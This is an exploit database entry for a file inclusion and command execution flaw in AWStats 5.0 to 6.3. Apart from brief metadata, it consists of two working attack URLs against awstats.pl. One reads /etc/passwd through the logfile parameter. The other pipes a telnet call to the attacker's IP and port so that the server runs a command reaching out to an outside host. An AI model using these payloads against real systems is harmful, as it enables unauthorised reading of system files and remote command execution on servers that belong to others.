AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution

Author: Johnathan Bat
type: webapps
platform: cgi
port: 
date_added: 2004-08-20 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-9109 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comawstats-5.0.tgz

Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]